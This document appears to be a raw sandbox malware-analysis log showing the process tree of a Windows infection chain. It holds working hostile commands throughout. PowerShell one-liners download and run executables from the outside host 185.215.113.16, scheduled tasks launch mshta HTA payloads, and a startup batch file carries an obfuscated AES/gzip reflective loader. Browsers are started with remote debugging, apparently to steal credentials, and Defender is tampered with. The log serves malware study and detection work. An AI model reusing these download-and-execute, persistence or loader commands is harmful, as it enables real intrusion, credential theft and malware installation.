C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2032,i,10233701188563563872,15360963893458343134,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2028 /prefetch:27⤵PID:5456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1852,i,10233701188563563872,15360963893458343134,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2072 /prefetch:37⤵PID:1596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,10233701188563563872,15360963893458343134,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2288 /prefetch:87⤵PID:3496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,10233701188563563872,15360963893458343134,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:17⤵
- Uses browser remote debugging
PID:5004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,10233701188563563872,15360963893458343134,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3284 /prefetch:17⤵
- Uses browser remote debugging
PID:4668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,10233701188563563872,15360963893458343134,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4500 /prefetch:17⤵
- Uses browser remote debugging
PID:4656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3656,i,10233701188563563872,15360963893458343134,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4652 /prefetch:87⤵PID:5544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4264,i,10233701188563563872,15360963893458343134,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4776 /prefetch:87⤵PID:876
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5200
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:6284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 17126⤵
- Program crash
PID:4584
-
-
-
C:\Users\Admin\AppData\Local\Temp\10006960101\529341dc7d.exe"C:\Users\Admin\AppData\Local\Temp\10006960101\529341dc7d.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1644 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1624
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085378101\239247cd96.exe"C:\Users\Admin\AppData\Local\Temp\1085378101\239247cd96.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn R9iQvmaGInI /tr "mshta C:\Users\Admin\AppData\Local\Temp\JjN59z2sx.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn R9iQvmaGInI /tr "mshta C:\Users\Admin\AppData\Local\Temp\JjN59z2sx.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1616
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\JjN59z2sx.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Users\Admin\AppData\Local\TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE"C:\Users\Admin\AppData\Local\TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1085379021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1085379021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "pqTP1maP5vA" /tr "mshta \"C:\Temp\SZuw6LrMN.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1212
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\SZuw6LrMN.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3824 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4576 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1788
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085382001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1085382001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Users\Admin\AppData\Local\Temp\1085382001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1085382001\7aencsM.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2924 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:588 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb3687cc40,0x7ffb3687cc4c,0x7ffb3687cc586⤵PID:1608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,16499550119511366509,13113824083640836030,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1908 /prefetch:26⤵PID:3960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,16499550119511366509,13113824083640836030,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2128 /prefetch:36⤵PID:5100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,16499550119511366509,13113824083640836030,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2220 /prefetch:86⤵PID:1212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,16499550119511366509,13113824083640836030,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3164 /prefetch:16⤵
- Uses browser remote debugging
PID:3080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,16499550119511366509,13113824083640836030,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:16⤵
- Uses browser remote debugging
PID:4224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4232,i,16499550119511366509,13113824083640836030,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4412 /prefetch:16⤵
- Uses browser remote debugging
PID:4436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4652,i,16499550119511366509,13113824083640836030,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4668 /prefetch:86⤵PID:968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4580,i,16499550119511366509,13113824083640836030,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4756 /prefetch:86⤵PID:1464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4784,i,16499550119511366509,13113824083640836030,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4868 /prefetch:86⤵PID:448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,16499550119511366509,13113824083640836030,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4932 /prefetch:86⤵PID:2640
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:868 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb368846f8,0x7ffb36884708,0x7ffb368847186⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1340,17062555095194936996,4391253317520484116,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:26⤵PID:3080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1340,17062555095194936996,4391253317520484116,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:4972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1340,17062555095194936996,4391253317520484116,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:86⤵PID:536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1340,17062555095194936996,4391253317520484116,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:16⤵
- Uses browser remote debugging
PID:1608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1340,17062555095194936996,4391253317520484116,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:16⤵
- Uses browser remote debugging
PID:4832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1340,17062555095194936996,4391253317520484116,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:16⤵
- Uses browser remote debugging
PID:4936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1340,17062555095194936996,4391253317520484116,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:16⤵
- Uses browser remote debugging
PID:508
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\c2d26" & exit5⤵PID:4464
-
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4580
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3740 -s 9564⤵
- Program crash
PID:1064
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1085385041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵PID:1288
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:4764
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 9684⤵
- Program crash
PID:4360
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085387001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1085387001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4312
-
-
C:\Users\Admin\AppData\Local\Temp\1085388001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1085388001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2664
-
-
C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5032 -
C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4896
-
-
